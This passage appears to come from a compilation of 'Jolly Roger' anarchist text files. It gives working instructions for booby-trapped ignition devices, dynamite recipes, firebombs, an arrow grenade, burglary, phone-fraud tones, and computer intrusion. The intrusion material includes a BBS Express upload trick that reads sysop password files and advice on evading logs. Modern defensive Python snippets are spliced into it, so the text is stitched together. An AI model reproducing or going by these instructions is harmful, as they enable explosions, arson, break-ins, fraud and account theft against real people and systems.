5. Choose a strategic location overlooking the target site. Try to position
yourself in such a way that you can see his facial contortions.
6. Sit back and enjoy the fireworks! Assembly of the versatile, economic, and
effective terrorist kit #1: the parts you'll need are:
· 4 AA batteries
· 1 9-volt battery
· 1 SPDT mini relay (radio shack)
· 1 rocket engine(smoke bomb or m-80)
· 1 solar igniter (any hobby store)
· 1 9-volt battery connector
1. Take the 9-volt battery and wire it through the relay's coil. This circuit
should also include a pair of contacts that when separated cut off this circuit.
These contacts should be held together
by trapping them between the locker, mailbox, or car door. Once the door is
opened, the contacts fall apart and the 9-volt circuit is broken, allowing the
relay to fall to the closed position thus closing
the ignition circuit. (If all this is confusing take a look at the schematic
below.)
2. Take the 4 AA batteries and wire them in succession. Wire the positive
terminal of one to the negative terminal of another, until all four are
connected except one positive terminal and one
negative terminal. Even though the four AA batteries only combine to create 6
volts, the increase in amperage is necessary to activate the solar igniter
quickly and effectively.
3. Take the battery pack (made in step 2) and wire one end of it to the relay's
single pole and the other end to one prong of the solar igniter. Then wire the
other prong of the solar igniter back
to the open position on the relay.
4. Using double sided carpet tape mount the kit in his locker, mailbox, or car
door. And last, insert the solar igniter into the rocket engine (smoke bomb or
m-80).
Your kit is now complete!
---------><---------
I (CONTACTS) I
I I
I - (BATTERY)
I ---
I I
I (COIL) I
------///////-------
/-----------
/ I
/ I
/ I
(SWITCH) I I
I I
I --- (BATTERY)
I - ( PACK )
I ---
I I
I I
---- -----
I I
*
(SOLAR IGNITER)
52. How to Start A Conference w/o 2600hz or M-F by The Jolly Roger
This method of starting the conf. Depends on your ability to bullshit the
operator into dialing a number which can only be reached with an operator's M-F
tones. When bullshitting the operator
remember operator's are not hired to think but to do.
Here is a step-by-step way to the conf.:
Call the operator through a pbx or extender, you could just call one Through
your line but I wouldn't recommend it.
Say to the operator: TSPS maintenance engineer, ring-forward to 213+080+1100,
position release, thank you.(she will probably ask you for the number again)
Definitions:
Ring-forward instructs her to dial the number.
Position release instructs her to release the trunk after she has dialed the
number.
+ - remember to say 213plus080 plus1100.
3. When you are connected with the conf. You will here a whistle blow twice and
a recording asking you for your operator number. Dial in any five digits and hit
the pounds sign a couple of times.
Simply dial in the number of the billing line ect. When the recording ask for
it. When in the control mode of the conf. Hit '6' to transfer control. Hit '001'
to reenter the number of conferee's and time
amount which you gave when you stared the conf. Remember the size can be from
2-59 conferee's. I have not found out the 'lengths' limits.
53. How to Make Dynamite by The Jolly Roger
Dynamite is nothing more than just nitroglycerin and a stabilizing agent to make
it much safer to use. The numbers are percentages, be sure to mix these
carefully and be sure to use the exact amounts.
These percentages are in weight ratio, not volume.
Number Ingredients Amount
1st Nitroglycerin 32%
Sodium Nitrate 28%
Woodmeal 10%
Ammonium Oxalate 29%
Guncotton 1%
2nd Nitroglycerin 24%
Potassium Nitrate 9%
Sodium Nitrate 56%
Woodmeal 9%
Ammonium Oxalate 2%
3rd Nitroglycerin 35½%
Potassium Nitrate 44½%
Woodmeal 6%
Guncotton 2½%
Vaseline 5½%
Powdered Charcoal 6%
4th Nitroglycerin 25%
Potassium Nitrate 26%
Woodmeal 34%
Barium Nitrate 5%
Starch 10%
5th Nitroglycerin 57%
Potassium Nitrate 19%
Woodmeal 9%
Ammonium Oxalate 12%
Guncotton 3%
6th Nitroglycerin 18%
Sodium Nitrate 70%
Woodmeal 5½%
Potassium Chloride 4½%
Chalk 2%
7th Nitroglycerin 26%
Woodmeal 40%
Barium Nitrate 32%
Sodium Carbonate 2%
8th Nitroglycerin 44%
Woodmeal 12%
Anhydrous Sodium Sulfate 44%
9th Nitroglycerin 24%
Potassium Nitrate 32½%
Woodmeal 33½%
Ammonium Oxalate 10%
10th Nitroglycerin 26%
Potassium Nitrate 33%
Woodmeal 41%
11th Nitroglycerin 15%
Sodium Nitrate 62.9%
Woodmeal 21.2%
Sodium Carbonate .9%
12th Nitroglycerin 35%
Sodium Nitrate 27%
Woodmeal 10%
Ammonium Oxalate 1%
13th Nitroglycerin 32%
Potassium Nitrate 27%
Woodmeal 10%
Ammonium Oxalate 30%
Guncotton 1%
14th Nitroglycerin 33%
Woodmeal 10.3%
Ammonium Oxalate 29%
Guncotton .7%
Potassium Perchloride 27%
15th Nitroglycerin 40%
Sodium Nitrate 45%
Woodmeal 15%
16th Nitroglycerin 47%
Starch 50%
Guncotton 3%
17th Nitroglycerin 30%
Sodium Nitrate 22.3%
Woodmeal 40½%
Potassium Chloride 7.2%
18th Nitroglycerin 50%
Sodium Nitrate 32.6%
Woodmeal 17%
Ammonium Oxalate .4%
19th Nitroglycerin 23%
Potassium Nitrate 27½%
Woodmeal 37%
Ammonium Oxalate 8%
Barium Nitrate 4%
Calcium Carbonate ½%
If you can't seem to get one or more of the ingredients try another one. If you
still can't, you can always buy small amounts from your school, or maybe from
various chemical companies. When you do
that, be sure to say as little as possible, if during the school year, and they
ask, say it's for a experiment for school.
54. Auto Exhaust Flame Thrower by The Jolly Roger
For this one, all you need is a car, a spark plug, ignition wire and a switch.
Install the spark plug into the last four or five inches of the tail pipe by
drilling a hole that the plug can screw into easily. Attach
the wire (this is regular insulated wire) to one side of the switch and to the
spark plug. The other side of the switch is attached to the positive terminal on
the battery. With the car running, simply hit the
switch and watch the flames fly!!! Again be careful that no one is behind you! I
have seen some of these flames go 20 feet!!!
55. Breaking into BBS Express by The Jolly Roger
If you have high enough access on any BBS Express BBS you can get the Sysop's
password without any problems and be able to log on as him and do whatever you
like. Download the Pass file,
delete the whole BBS, anything. It's all a matter of uploading a text file and
downloading it from the BBS. You must have high enough access to see new uploads
to do this. If you can see a file you just
uploaded you have the ability to break into the BBS in a few easy steps. Why am
I telling everyone this when I run BBS Express myself? Well there is one way to
stop this from happening and I want
other Sysops to be aware of it and not have it happen to them. Breaking in is
all based on the MENU function of BBS Express. Express will let you create a
menu to display different text files by putting
the word MENU at the top of any text file and stating what files are to be
displayed. But due to a major screw up by Mr. Ledbetter you can use this MENU
option to display the USERLOG and the
Sysop's Passwords or anything else you like. I will show you how to get the
Sysop's pass and therefore log on as the Sysop. BBS Express Sysops have 2
passwords. One like everyone else gets in the
form of X1XXX, and a Secondary password to make it harder to hack out the Sysop's
pass. The Secondary pass is found in a file called SYSDATA.DAT. This file must
be on drive 1 and is therefore
easy to get.
All you have to do is upload this simple Text file:
MENU
1
D1:SYSDATA.DAT
Rip-off time!
After you upload this file you download it non-Xmodem. Stupid Express thinks
it is displaying a menu and you will see this:
Rip-off time!
Selection [0]:
Just hit 1 and Express will display the SYSDATA.DAT file. OPPASS is where the
Sysop's Secondary pass will be. D1:USERLOG.DAT is where you will find the name
and Drive number of the
USERLOG.DAT file. The Sysop might have renamed this file or put it in a
Subdirectory or even on a different drive. I Will Assume he left it as
D1:USERLOG.DAT. The other parts of this file tell you
where the .HLP screens are and where the LOG is saved and all the Download path
names.
Now to get the Sysop's primary pass you upload a text file like this:
MENU
1
D1:USERLOG.DAT
Breaking into Bedwetter's BBS
Again you then download this file non-Xmodem and you will see:
Breaking into Bedwetter's BBS
Selection [0]:
You then hit 1 and the long USERLOG.DAT file comes flying at you. The Sysop is
the first entry in this very long file so it is easy. You will see:
SYSOP'S NAME X1XXX
You should now have his 2 passwords.
There is only one easy way out of this that I can think of, and that is to make
all new uploads go to SYSOP level (Level 9) access only. This way nobody can
pull off what I just explained. I feel this is a
major Bug on Mr. Ledbetter's part. I just don't know why no one had thought of
it before. I would like to give credit to Redline for the message he left on
Modem Hell telling about this problem, and
also to Unka for his ideas and input about correcting it.
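For sysops, the underlying flaw is that caller-supplied text is interpreted as a MENU directive and may name any file on the system. The sketch below is an added example, not BBS Express code and not from the original article: it models the flawed viewer beside a hardened one that never interprets uploads and confines menu entries to a public drive, which goes beyond the Level 9 workaround described above. The file layout (MENU, entry count, file specs, banner), the `D2:` public drive, and all function names are assumptions.

```python
import re

# Constructed stand-in for the BBS disks: file spec -> contents (placeholder data).
DISK = {
    "D1:SYSDATA.DAT": "OPPASS=<placeholder>\n",
    "D2:HELP.TXT": "Help screen\n",
}

# Assumption: only files on this drive are meant to be shown to callers.
PUBLIC_PREFIXES = ("D2:",)
# Assumption: a plain "Dn:NAME.EXT" spec, no wildcards or subdirectories.
SPEC_RE = re.compile(r"D[1-8]:[A-Z0-9]{1,8}(\.[A-Z0-9]{1,3})?")


class MenuError(Exception):
    """Raised when a menu file is malformed or names a file it may not show."""


def parse_menu(text):
    """Return (file_specs, banner) for a MENU file, or None for ordinary text."""
    lines = text.splitlines()
    if not lines or lines[0].strip() != "MENU":
        return None
    try:
        count = int(lines[1].strip())
    except (IndexError, ValueError):
        raise MenuError("missing or non-numeric entry count")
    if count < 1 or len(lines) < 2 + count:
        raise MenuError("entry count does not match file")
    specs = [line.strip().upper() for line in lines[2:2 + count]]
    banner = "\n".join(lines[2 + count:])
    return specs, banner


def view_naive(text, choice):
    """The flawed behaviour: any file starting with MENU is obeyed."""
    menu = parse_menu(text)
    if menu is None:
        return text
    specs, _ = menu
    return DISK[specs[choice - 1]]


def view_hardened(text, choice, sysop_authored):
    """Obey MENU only in sysop-authored files, and only for public file specs."""
    if not sysop_authored:
        return text  # caller uploads are data: shown verbatim, never interpreted
    menu = parse_menu(text)
    if menu is None:
        return text
    specs, _ = menu
    if not 1 <= choice <= len(specs):
        raise MenuError("no such selection")
    spec = specs[choice - 1]
    if not SPEC_RE.fullmatch(spec) or not spec.startswith(PUBLIC_PREFIXES):
        raise MenuError("menu entry outside the public area: " + spec)
    if spec not in DISK:
        raise MenuError("menu entry does not exist: " + spec)
    return DISK[spec]


# The upload described in the text, and a legitimate sysop menu (constructed).
UPLOADED = "MENU\n1\nD1:SYSDATA.DAT\nRip-off time!\n"
SYSOP_MENU = "MENU\n1\nD2:HELP.TXT\nHelp files\n"

if __name__ == "__main__":
    print(repr(view_naive(UPLOADED, 1)))            # system file leaks
    print(repr(view_hardened(UPLOADED, 1, False)))  # upload shown as plain text
    print(repr(view_hardened(SYSOP_MENU, 1, True)))
```

Keeping credential files off any drive that the viewer can reach at all removes the dependency on the check being right.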
56. Firebombs by The Jolly Roger
Most fire bombs are simply gasoline filled bottles with a fuel soaked rag in the
mouth (the bottle's mouth, not yours). The original Molotov cocktail, and still
about the best, was a mixture of one part
gasoline and one part motor oil. The oil helps it to cling to what it splatters
on. Some use one part roofing tar and one part gasoline. Fire bombs have been
found which were made by pouring melted
wax into gasoline.
57. Fuse Ignition Bomb by The Jolly Roger
A four strand homemade fuse is used for this. It burns like fury. It is held
down and concealed by a strip of bent tin cut from a can. The exposed end of the
fuse is dipped into the flare igniter. To use
this one, you light the fuse and hold the fire bomb until the fuse has burned
out of sight under the tin. Then throw it and when it breaks, the burning fuse
will ignite the contents.
58. Generic Bomb by The Jolly Roger
1. Acquire a glass container.
2. Put in a few drops of gasoline.
3. Cap the top.
4. Now turn the container around to coat the inner surfaces and then evaporates.
5. Add a few drops of potassium permanganate (Get this stuff from a snake bite
kit)
6. The bomb is detonated by throwing against a solid object.
After throwing this thing, run like hell. This thing packs about ½ stick of
dynamite.
59. Green Box Plans by the Jolly Roger
Paying the initial rate in order to use a red box (on certain fortresses) left a
sour taste in many red boxers mouths, thus the green box was invented. The green
box generates useful tones such as COIN
COLLECT, COIN RETURN, AND RINGBACK. These are the tones that ACTS or the TSPS
operator would send to the CO when appropriate. Unfortunately, the green box
cannot be used at the
fortress station but must be used by the CALLED party.
Here are the tones:
COIN COLLECT 700+1100hz
COIN RETURN 1100+1700hz
RINGBACK 700+1700hz
Before the called party sends any of these tones, an operator release signal
should be sent to alert the MF detectors at the CO. This can be done by sending
900hz + 1500hz or a single 2600 wink (90
ms.) Also do not forget that the initial rate is collected shortly before the 3
minute period is up. Incidentally, once the above MF tones for collecting and
returning coins reach the CO, they are converted
into an appropriate DC pulse (-130 volts for return and +130 for collect). This
pulse is then sent down the tip to the fortress. This causes the coin relay to
either return or collect the coins. The alleged
"T-network" takes advantage of this information. When a pulse for coin collect
(+130 VDC) is sent down the line, it must be grounded somewhere. This is usually
the yellow or black wire. Thus, if the
wires are exposed, these wires can be cut to prevent the pulse from being
grounded. When the three minute initial period is almost up, make sure that the
black and yellow wires are severed, then hang
up, wait about 15 seconds in case of a second pulse, reconnect the wires, pick
up the phone, and if all goes well, it should be "JACKPOT" time.
60. Portable Grenade Launcher by The Jolly Roger
If you have a bow, this one is for you. Remove the ferrule from an aluminum
arrow, and fill the arrow with black powder (I use grade FFFF, it burns easy)and
then glue a shotshell primer into the hole
left where the ferrule went. Next, glue a BB on the primer, and you are ready to
go! Make sure no one is nearby.... Little shreds of aluminum go all over the
place!!
61. Hacking Tutorial by The Jolly Roger
What is hacking?
According to popular belief, the terms hacker and hacking originated at MIT; they
come from the root of a hack writer, someone who keeps "hacking" at the
typewriter until he finishes the story. A
computer hacker would be hacking at the keyboard or password works.
What you need:
To hack you need a computer equipped with a modem (a device that lets you
transmit data over phone lines) which should cost you from $100 to $1200.
How do you hack?
Hacking requires two things:
1. The phone number.
2. Answer to identity elements.
How do you find the phone number?
There are three basic ways to find a computer's phone number:
1. Scanning
2. Directory
3. Inside info
What is scanning?
Scanning is the process of having a computer search for a carrier tone. For
example, the computer would start at (800) 111-1111 and wait for carrier if
there is none it will go on to 111-1112 etc. If
there is a carrier it will record it for future use and continue looking for
more.
What is directory assistance?
This way can only be used if you know where your target computer is. For this
example say it is in menlo park, CA and the company name is Sri.
1. Dial 411 (or 415-555-1212)
2. Say "Menlo park"
3. Say "Sri"
4. Write down number
5. Ask if there are any more numbers
6. If so write them down.
7. Hang up on operator
8. Dial all numbers you were given
9. Listen for carrier tone
10. If you hear carrier tone write down number, call it on your modem and you're
set to hack!
62. The Basics of Hacking II by The Jolly Roger
Basics to know before doing anything, essential to your continuing career as one
of the elite in the country... This article, "The introduction to the world of
hacking." is meant to help you by telling you
how not to get caught, what not to do on a computer system, what type of
equipment should I know about now, and just a little on the history, past
present future, of the hacker.
Welcome to the world of hacking! We, the people who live outside of the normal
rules, and have been scorned and even arrested by those from the 'civilized
world', are becoming scarcer every day.
This is due to the greater fear of what a good hacker (skill wise, no moral
judgments here) can do nowadays, thus causing anti- hacker sentiment in the
masses. Also, few hackers seem to actually know
about the computer systems they hack, or what equipment they will run into on
the front end, or what they could do wrong on a system to alert the 'higher'
authorities who monitor the system. This
article is intended to tell you about some things not to do, even before you get
on the system. I will tell you about the new wave of front end security devices
that are beginning to be used on computers.
I will attempt to instill in you a second identity, to be brought up at time of
great need, to pull you out of trouble. And, by the way, I take no, repeat, no,
responsibility for what we say in this and the
forthcoming articles.
Enough of the bullshit, on to the fun: after logging on your favorite bbs, you
see on the high access board a phone number! It says it's a great system to
"fuck around with!" This may be true, but how
many other people are going to call the same number? So: try to avoid calling a
number given to the public. This is because there are at least every other user
calling, and how many other boards will
that number spread to? If you call a number far, far away, and you plan on going
through an extender or a re-seller, don't keep calling the same access number
(I.E. As you would if you had a hacker
running), this looks very suspicious and can make life miserable when the phone
bill comes in the mail. Most cities have a variety of access numbers and
services, so use as many as you can. Never trust
a change in the system... The 414's, the assholes, were caught for this reason:
when one of them connected to the system, there was nothing good there. The next
time, there was a trek game stuck
right in their way! They proceeded to play said game for two, say two and a half
hours, while telenet was tracing them! Nice job, don't you think? If anything
looks suspicious, drop the line
immediately!! As in, yesterday!! The point we're trying to get across is: if you
use a little common sense, you won't get busted. Let the little kids who aren't
smart enough to recognize a trap get busted,
it will take the heat off of the real hackers. Now, let's say you get on a
computer
system... It looks great, checks out, everything seems fine. OK, now is when it
gets more dangerous. You have to know the computer system to know what not to
do. Basically, keep away from any
command something, copy a new file into the account, or whatever! Always leave
the account in the same status you logged in with. Change *nothing*... If it
isn't an account with priv's, then don't try
any commands that require them! All, yes all, systems are going to be keeping
log files of what users are doing, and that will show up. It is just like
dropping a trouble-card in an ESS system, after
sending that nice operator a pretty tone. Spend no excessive amounts of time on
the account in one stretch. Keep your calling to the very late night if
possible, or during business hours (believe it or
not!). It so happens that there are more users on during business hours, and it
is very difficult to read a log file with 60 users doing many commands every
minute. Try to avoid systems where everyone
knows each other, don't try to bluff. And above all: never act like you own the
system, or are the best there is. They always grab the people whose heads
swell... There is some very interesting front
end equipment around nowadays, but first let's define terms... By front end, we
mean any device that you must pass through to get at the real computer. There
are devices that are made to defeat
hacker programs, and just plain old multiplexers. To defeat hacker programs,
there are now devices that pick up the phone and just sit there... This means
that your device gets no carrier, thus you
think there isn't a computer on the other end. The only way around it is to
detect when it was picked up. If it picks up after the same number ring, then
you know it is a hacker-defeater. These devices
take a multi-digit code to let you into the system. Some are, in fact, quite
sophisticated to the point where it will also limit the user name's down, so
only one name or set of names can be valid logins
after they input the code... Other devices input a number code, and then they
dial back a pre-programmed number for that code. These systems are best to leave
alone, because they know someone is
playing with their phone. You may think "but I'll just reprogram the dial-back."
Think again, how stupid that is... Then they have your number, or a test loop if
you were just a little smarter. If it's your
number, they have your balls (if male...), if it's a loop, then you are screwed
again, since those loops
are *monitored*. As for multiplexers... What a plexer is supposed to do is this:
The system can accept multiple users. We have to time share, so we'll let the
front-end processor do it... Well, this is what a multiplexer does. Usually they
will ask for something like "enter class" or
"line:". Usually it is programmed for a double digit number, or a four to five
letter word. There are usually a few sets of numbers it accepts, but those
numbers also set your 300/1200/2400 baud data
type. These multiplexers are inconvenient at best, so not to worry. A little
about the history of hacking: hacking, by my definition, means a great knowledge
of some special area. Doctors and lawyers
are hackers of a sort, by this definition. But most often, it is being used in
the computer context, and thus we have a definition of "anyone who has a great
amount of computer or telecommunications
knowledge." You are not a hacker because you have a list of codes... Hacking, by
my definition, has then been around only about 15 years. It started, where else
but, MIT and colleges where they
had computer science or electrical engineering departments. Hackers have created
some of the best computer languages, the most awesome operating systems, and
even gone on to make millions.
Hacking used to have a good name, when we could honestly say "we know what we
are doing". Now it means (in the public eye): the 414's, Ron Austin, the NASA
hackers, the arpanet hackers... All
the people who have been caught, have done damage, and are now going to have to
face fines and sentences. Thus we come past the moralistic crap, and to our
purpose: educate the hacker
community, return to the days when people actually knew something...
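The article assumes that a log with 60 users issuing commands every minute is too busy to read. That holds for reading by eye, not for a per-account check, as this added example (not part of the original text) shows over a constructed log. The line format `HH:MM account priv|nopriv command`, the account names and the function names are assumptions; `enable` and `build` are the privileged commands named elsewhere on this page.

```python
from collections import defaultdict

# Commands that need privileges (the two named in the DEC article on this page).
PRIV_COMMANDS = {"enable", "build"}


def parse(line):
    """Split a constructed log line into (time, account, has_privs, verb)."""
    ts, account, privs, command = line.split(maxsplit=3)
    return ts, account, privs == "priv", command.split()[0].lower()


def build_baseline(lines):
    """Record which verbs each account normally uses."""
    seen = defaultdict(set)
    for line in lines:
        _, account, _, verb = parse(line)
        seen[account].add(verb)
    return seen


def detect(lines, baseline):
    """Flag privileged commands from unprivileged accounts and first-seen verbs."""
    alerts = []
    for line in lines:
        ts, account, has_privs, verb = parse(line)
        if verb in PRIV_COMMANDS and not has_privs:
            alerts.append((ts, account, "priv-command-without-privs", verb))
        elif verb not in baseline.get(account, set()):
            alerts.append((ts, account, "new-command-for-account", verb))
    return alerts


def sample_logs():
    """Constructed data: 60 accounts, two routine commands each, every minute."""
    routine = ("dir", "type notes.txt")
    baseline = [f"09:{m:02d} user{u:02d} nopriv {c}"
                for m in range(5) for u in range(60) for c in routine]
    busy = [f"10:{m:02d} user{u:02d} nopriv {c}"
            for m in range(5) for u in range(60) for c in routine]
    # Two out-of-pattern lines buried in the middle of 600 routine ones.
    busy.insert(300, "10:02 user17 nopriv enable")
    busy.insert(301, "10:02 user17 nopriv take setup.cmd")
    return baseline, busy


if __name__ == "__main__":
    base_lines, busy_lines = sample_logs()
    for alert in detect(busy_lines, build_baseline(base_lines)):
        print(alert)
```

Volume does not hide either line: each account is compared only with its own history, so the other 59 accounts add no noise.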
63. Hacking DEC's by The Jolly Roger
In this article you will learn how to log in to dec's, logging out, and all the
fun stuff to do in-between. All of this information is based on a standard dec
system. Since there are dec systems 10 and 20,
and I favor, the dec 20, there will be more info on them in this article. It
just so happens that the dec 20 is also the more common of the two, and is used
by much more interesting people (if you know
what I mean...) OK, the first thing you want to do when you are receiving
carrier from a dec system is to find out the format of login names. You can do
this by looking at who is on the system.
Dec=> ` (the 'exec' level prompt)
you=> sy
sy: short for sy(stat) and shows you the system status.
You should see the format of login names. A systat usually comes up in this
form:
Job Line Program User
Job: The job number (not important unless you want to log them off later)
Line: What line they are on (used to talk to them...) These are both two or
three digit numbers.
Program: What program are they running under? If it says 'exec' they aren't
doing anything at all...
User: ahhhahhhh! This is the user name they are logged in under... Copy the
format, and hack yourself outa working code... Login format is as such:
dec=> `
you=> login username password
Username is the username in the format you saw above in the systat. After you
hit the space after your username, it will stop echoing characters back to your
screen. This is the password you are
typing in... Remember, people usually use their name, their dog's name, the name
of a favorite character in a book, or something like this. A few clever people
have it set to a key cluster (qwerty or
asdfg). Passwords can be from 1 to 8 characters long, anything after that is
ignored. You are finally in... It would be nice to have a little help, wouldn't
it? Just type a ? Or the word help, and it will give
you a whole list of topics... Some handy characters for you to know would be the
control keys, wouldn't it? Backspace on a dec 20 is rub which is 255 on your
ASCII chart. On the dec 10 it is
control-H. To abort a long listing or a program, control-C works fine. Use
Control-O to stop long output to the terminal. This is handy when playing a
game, but you don't want to control-C out.
Control-T for the time. Control-u will kill the whole line you are typing at the
moment. You may accidentally run a program where the only way out is a
control-X, so keep that in reserve. Control-s to
stop listing, control-Q to continue on both systems. Is your terminal having
trouble?? Like, it pauses for no reason, or it doesn't backspace right? This is
because both systems support many terminals,
and you haven't told it what yours is yet... You are using a VT05 so you need to
tell it you are one.
Dec=> `
you=> information terminal
-or-
You=> info
(This shows you what your terminal is set up as.)
Dec=>all sorts of shit, then the `
you=> set ter vt05
(This sets your terminal type to VT05.)
Now let's see what is in the account (here after abbreviated acct.) that you
have hacked onto. Say:
=> dir
(Short for directory.)
It shows you what the user of the code has saved to the disk. There should be a
format like this: xxxxx.Ooo
xxxxx is the file name, from 1 to 20 characters long.
Ooo is the file type, one of: exe, txt, dat,
bas, cmd and a few others that are system dependent. Exe is a compiled program
that can be run (just by typing its name at the `)
Txt is a text file, which you can see by typing:
=>type xxxxx.Txt
Do not try to:
=>type xxxxx.Exe
(This is very bad for your terminal and will tell you absolutely nothing.)
Dat is data they have saved.
Bas is a basic program, you can have it typed out for you.
Cmd is a command type file, a little too complicated to go into here. Try:
=>take xxxxx.Cmd
By the way, there are other users out there who may have files you can use.
(Gee, why else am I here?)
=> dir <*.*> (Dec 20)
=> dir [*,*] (Dec 10)
* is a wildcard, and will allow you to access the files on other accounts if the
user has it set for public access. If it isn't set for public access, then you
won't see it. To run that program:
dec=> `
you=> username program-name
Username is the directory you saw the file listed under, and file name was what
else but the file name? ** You are not alone ** remember, you said (at the very
start) sy short for systat, and how we
said this showed the other users on the system? Well, you can talk to them, or
at least send a message to anyone you see listed in a systat. You can do this
by:
dec=> the user list (from your systat)
you=> talk username (Dec 20)
send username (Dec 10)
Talk allows you and them immediate transmission of whatever you/they type to be
sent to the other. Send only allow you one message to be sent, and send, they
will send back to you, with talk you
can just keep going. By the way, you may be noticing with the talk command that
what you type is still acted upon by the parser (control program). To avoid the
constant error messages type either:
you=> ;your message
you=> rem your message
the semi-colon tells the parser that what follows is just a comment. Rem is
short for 'remark' and ignores you from then on until you type a control-Z or
control-C, at which point it puts you back in the
exec mode. To break the connection from a talk command type:
you=> break
Priv's:
If you happen to have privs, you can do all sorts of things. First of all, you
have to activate those privs.
You=> enable
This gives you a $ prompt, and allows you to do this: whatever you can do to
your own directory you can now do to any other directory. To create a new acct.
Using your privs, just type:
=>build username
If username is old, you can edit it, if it is new, you can define it to be
whatever you wish. Privacy means nothing to a user with privs. By the way, there
are various levels of privs: operator, wheel, cia.
Wheel is the most powerful, being that he can log in from anywhere and have his
powers. Operators have their power because they are at a special terminal
allowing them the privs. Cia is short for
'confidential information access', which allows you a low level amount of privs.
Not to worry though, since you can read the system log file, which also has the
passwords to all the other accounts.
To de-activate your privs, type:
you=> disable
when you have played your greedy heart out, you can finally leave the
system with the command:
=>logout
This logs the job you are using off the system (there may be variants of this
such as kjob, or killjob.)
64. Harmless Bombs by The Jolly Roger
To all those who do not wish to inflict bodily damage on their victims but only
terror. These are weapons that should be used from high places.
1. The Flour Bomb
Take a wet paper towel and pour a given amount of baking flour in the center.
Then wrap it up and put on a rubber band to keep it together. When thrown it
will fly well but when it hits, it
covers the victim with the flower or causes a big puff of flour which will put
the victim in terror since as far as they are concerned, some strange white
powder is all over them. This is a cheap method of
terror and for only the cost of a roll of paper towels and a bag of flour you
and your friends can have loads of fun watching people flee in panic.
2. Smoke Bomb Projectile
All you need is a bunch of those little round smoke bombs and a wrist rocket or
any sling-shot. Shoot the smoke bombs and watch the terror since they think it
will blow up!
3. Rotten Eggs (Good ones)
Take some eggs and get a sharp needle and poke a small hole in the top of each
one. Then let them sit in a warm place for about a week. Then you've got a bunch
of rotten eggs that will
only smell when they hit.
4. Glow in the Dark Terror
Take one of those tubes of glow in the dark stuff and pour the stuff on whatever
you want to throw and when it gets on the victim, they think it's some deadly
chemical or a radioactive
substance so they run in total panic. This works especially well with flower
bombs since a gummy, glowing substance gets all over the victim.
5. Fizzling Panic
Take a baggy of a water-baking soda solution and seal it. (Make sure there is no
air in it since the solution will form a gas and you don't want it to pop on
you.) Then put it in a bigger plastic bag and fill
it with vinegar and seal it. When thrown, the two substances will mix and cause
a violently bubbling substance to go all over the victim.
65. Breaking Into Houses by The Jolly Roger
Okay You Need:
1. Tear Gas or Mace
2. A BB/Pellet Gun
3. An Ice Pick
4. Thick Gloves
What You Do Is:
1. Call the house, or ring doorbell, to find out if they're home.
2. If they're not home then...
3. Jump over the fence or walk through gate (whatever).
4. If you see a dog give him the mace or tear gas.
5. Put the gloves on!!!!!!!
6. Shoot the BB gun slightly above the window locks.
7. Push the ice-pick through the hole (made by the BB gun).
8. Enter window.
9. FIRST...Find the LIVING ROOM. (there're neat things there!).
10. Goto the bedroom to get a pillow case. Put the goodies in the pillow case.
11. Get out <-* FAST! -*>
Notes: You should have certain targets worked out (like computers, Radios, Ect.)
Also <-* NEVER *-> Steal from your own neighborhood. If you think they have an
alarm...<-* FORGET IT! *->.
66. A Guide to Hypnotism by The Jolly Roger
What hypnotism is?
Hypnotism, contrary to common belief, is merely a state when your mind and body
are in a state of relaxation and your mind is open to positive, or cleverly
worded negative, influences. It is not a trance
where you:
· Are totally influenceable.
· Cannot lie.
· A sleep which you cannot wake up from without help.
This may bring down your hope somewhat, but, hypnotism is a powerful tool for self
help, and/or mischief.
Your subconscious mind
Before going in further, I'd like to state that hypnotism not only is great in
the way that it relaxes you and gets you (in the long run) what you want, but
also that it taps a force of incredible power, believe
it or not, this power is your subconscious mind. The subconscious mind always
knows what is going on with every part of your body, every moment of the day. It
protects you from negative influences,
and retains the power to slow your heartbeat down and stuff like that. The
subconscious mind holds just about all the info you would like to know
About yourself, or, in this case, the person you will be hypnotizing. There are
many ways to talk to your subconscious and have it talk back to you. One way is
the Ouija board; no, it's not a spirit, merely
the minds of those who are using it. Another, which I will discuss here, is the
pendulum method. OK, here is how it goes. First, get a ring or a washer and tie
it to a thread a little longer than half of
your forearm. Now, take a sheet of paper and draw a big circle in it. In the big
circle you must now draw a crosshair (a big +). Now, put the sheet of paper on a
table. Next, hold the thread with the
ring or washer on it and place it (holding the thread so that the ring is 1 inch
above the paper swinging) in the middle of the crosshair. Now, swing the thread
so the washer goes up and down, say to
yourself the word "Yes" now, do it side to side and say the word "no". Do it
counter clockwise and say "I don't know". And lastly, do it clockwise and say "I
don't want to say." Now, with the thread
back in the middle of the crosshair, ask yourself questions and wait for the
pendulum to swing in the direction for the answer. (yes, no, I don't know or I
don't want to say...). Soon, to your amazement,
it will be answering questions like anything... Let the pendulum answer, don't
try.. When you try you will never get an answer. Let the answer come to you.
How to induce hypnotism
Now that you know how to talk to your subconscious mind, I will now tell you how
to guide someone into hypnosis. Note that I said guide, you can never, hypnotize
someone, they must be willing.
OK, the subject must be lying or sitting in a comfortable position, relaxed, and
at a time when things aren't going to be interrupted. Tell them the following or
something close to it, in a peaceful,
monotonous tone (not a commanding tone of voice)
Note: Light a candle and place it somewhere where it can be easily seen.
"Take a deep breath through your nose and hold it in for a count of 8. Now,
through your mouth, exhale completely and slowly. Continue breathing long,
deep, breaths through your nose and exhaling
through your mouth. Tense up all your muscles very tight, now, counting from ten
to one, release them slowly, you will find them very relaxed. Now, look at the
candle, as you look at it, with every
breath and passing moment, you are feeling increasingly more and more peaceful
and relaxed. The candle's flame is peaceful and bright. As you look at it I will
count from 100 down, as I count, your
eyes will become more and more relaxed, getting more and more tired with each
passing moment." Now, count down from 100, about every 10 numbers say "When I
reach xx your eyes (or you will
find your eyes) are becoming more and more tired." Tell them they may close
their eyes whenever they feel like it. If the person's eyes are still open when
you get to 50 then instead of saying "your eyes
will.." Say "your eyes are...". When their eyes are shut say the following. As
you lie (or sit) here with your eyes comfortably closed you find yourself
relaxing more and more with each moment and
breath. The relaxation feels pleasant and blissful so, you happily give way to
this wonderful feeling. Imagine yourself on a cloud, resting peacefully, with a
slight breeze caressing your body. A tingling
sensation begins to work its way, within and without your toes, it slowly moves
up your feet, making them warm, heavy and relaxed. The cloud is soft and
supports your body with its soft texture, the
scene is peaceful and absorbing, the peacefulness absorbs you completely. The
tingling gently and slowly moves up your legs, relaxing them. Making them warm
and heavy. The relaxation feels very
good, it feels so good to relax and let go. As the tingling continues its
journey up into your solar plexus, you feel your inner stomach become very
relaxed. Now, it moves slowly into your chest, making
your breathing relaxed as well. The feeling begins to move up your arms to your
shoulders, making your arms heavy and relaxed as well. You are aware of the
total relaxation you are now
experiencing, and you give way to it. It is good and peaceful, the tingling now
